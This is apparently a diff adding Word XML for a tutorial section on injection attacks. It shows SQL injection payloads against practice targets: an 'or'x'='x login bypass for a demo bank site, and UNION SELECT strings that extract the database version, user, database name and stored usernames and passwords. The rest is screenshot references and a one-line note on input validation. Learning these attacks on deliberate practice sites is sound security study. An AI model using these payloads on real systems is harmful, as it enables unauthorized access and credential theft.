+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>IDS and IPS (Intrusion detection system and intrusion prevention system)</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Injection attack</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Injection attacks refer to a broad class of attack vectors that allow an attacker to supply </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+        </w:rPr>
+        <w:t>untrusted input</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to a program, which gets</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> processed by an interpreter as part of a command or query</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> which</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> alters the course of execution</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> of that program. Injection attacks are amongst the oldest and most dangerous web application attacks. They can result in data theft, data loss, loss of data integrity, denial of service, as well as full system compromise.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Try different injection attacks:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="36"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Demo.testfire.net is an online fake back website created for experimenting the injection attack.   </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t>To enter a banks admin account just any random user name and in</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ject the script in the password field. Script- “  ’</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>or’x</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>’=’x “ .</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">This script is translated into a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> query – select * from employ in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>db</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> where username=”” and password=””.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>To stop this we need to validate the entered data at the webpage itself.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5732780" cy="3224689"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+            <wp:docPr id="20" name="Picture 20" descr="C:\Users\Harsha_Hacker\Pictures\Screenshots\Screenshot (8).png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 6" descr="C:\Users\Harsha_Hacker\Pictures\Screenshots\Screenshot (8).png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId131" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5744464" cy="3231261"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5733414" cy="3225046"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+            <wp:docPr id="19" name="Picture 19" descr="C:\Users\Harsha_Hacker\Pictures\Screenshots\Screenshot (7).png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 5" descr="C:\Users\Harsha_Hacker\Pictures\Screenshots\Screenshot (7).png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId132" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5739385" cy="3228405"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D2978E8" wp14:editId="2B102F27">
+            <wp:extent cx="4552843" cy="4420235"/>
+            <wp:effectExtent l="0" t="0" r="635" b="0"/>
+            <wp:docPr id="23" name="Picture 23" descr="C:\Users\Harsha_Hacker\Pictures\Screenshots\Screenshot (9).png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 9" descr="C:\Users\Harsha_Hacker\Pictures\Screenshots\Screenshot (9).png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId133">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4559220" cy="4426426"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="36"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">3 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>‘ and</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 1=0 union select </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>null,version</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">() # -- to get the data the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>os</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> version of the system the website is running on.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5731510" cy="4873648"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
+            <wp:docPr id="24" name="Picture 24" descr="C:\Users\Harsha_Hacker\Pictures\Screenshots\Screenshot (10).png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 10" descr="C:\Users\Harsha_Hacker\Pictures\Screenshots\Screenshot (10).png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId134">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="4873648"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="36"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">3 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>‘ and</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 1=0 union select </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>null</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,user</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>() # -- to get name of the user.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5731510" cy="4821944"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="26" name="Picture 26" descr="C:\Users\Harsha_Hacker\Pictures\Screenshots\Screenshot (11).png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 12" descr="C:\Users\Harsha_Hacker\Pictures\Screenshots\Screenshot (11).png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId135">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="4821944"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="36"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">3 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>‘ and</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 1=0 union select </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>null</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,database</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>() # -- to get database name.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="36"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">3 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>‘ and</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 1=0 union select </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>null</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,concat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(first_name,0x0a,password) from users # -- for username and passwords.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Normal"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:snapToGrid w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:w w:val="0"/>
+          <w:sz w:val="0"/>
+          <w:szCs w:val="0"/>
+          <w:u w:color="000000"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="000000"/>
+          <w:shd w:val="clear" w:color="000000" w:fill="000000"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none" w:bidi="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5731510" cy="6029251"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="27" name="Picture 27" descr="C:\Users\Harsha_Hacker\Pictures\Screenshots\Screenshot (12).png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 13" descr="C:\Users\Harsha_Hacker\Pictures\Screenshots\Screenshot (12).png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId136">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="6029251"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
